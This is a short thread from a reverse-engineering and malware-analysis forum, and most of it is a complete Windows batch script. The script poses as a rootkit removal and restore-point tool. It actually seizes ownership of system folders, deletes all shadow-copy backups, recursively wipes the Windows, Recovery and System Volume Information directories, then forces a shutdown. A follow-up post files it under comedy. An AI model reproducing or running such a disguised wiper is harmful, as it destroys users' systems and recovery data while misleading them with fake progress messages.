A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #22095  by EP_X0FF
 Fri Jan 31, 2014 10:06 am
Code:
@echo off
echo Cruelsister's Rootkit Magic. Creating UnDo Point
takeown /f c:\* >nul 2>nul
takeown /f %windir%\* >nul 2>nul
takeown /f %windir%\system32 >nul 2>nul
takeown /f %windir%\system32\* >nul 2>nul
takeown /f %windir%\system32\drivers >nul 2>nul
takeown /f %windir%\system32\drivers\*  >nul 2>nul
takeown /f c:\recovery >nul 2>nul
takeown /f c:\recovery\* >nul 2>nul
takeown /f c:\perflogs >nul 2>nul
takeown /f c:\perflogs\* >nul 2>nul
takeown /f "c:\system volume information\" >nul 2>nul
takeown /f "c:\system volume information\*" >nul 2>nul

icacls c:\* /grant administrators:f /t >nul 2>nul
icacls %windir% /grant administrators:f /t >nul 2>nul
icacls %windir%\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32 /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\* /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers /grant administrators:f /t >nul 2>nul
icacls %windir%\system32\drivers\* /grant administrators:f /t >nul 2>nul
icacls c:\recovery /grant administrators:f /t >nul 2>nul
icacls c:\recovery\* /grant administrators:f /t >nul 2>nul
icacls c:\perflogs /grant administrators:f /t >nul 2>nul
icacls c:\perflogs\* /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\" /grant administrators:f /t >nul 2>nul
icacls "c:\system volume information\*" /grant administrators:f /t >nul 2>nul

echo Scanning for Infection. Please Wait...
vssadmin delete shadows /All /Quiet >nul 2>nul 
vssadmin delete shadows /All /Quiet >nul 2>nul 
rmdir c:\PrefLogs /s /q >nul 2>nul 
rmdir c:\Recovery /s /q >nul 2>nul
rmdir "C:\System Volume Information" /s /q >nul 2>nul
rmdir c:\Windows /s /q >nul 2>nul

shutdown /s  /f /t 06 /c "All Done! Hope you like the Results!!"
exit
 #22107  by EP_X0FF
 Sat Feb 01, 2014 3:47 am
It is the comedy section, of course. Just like Viktor Antivirus Cleaner.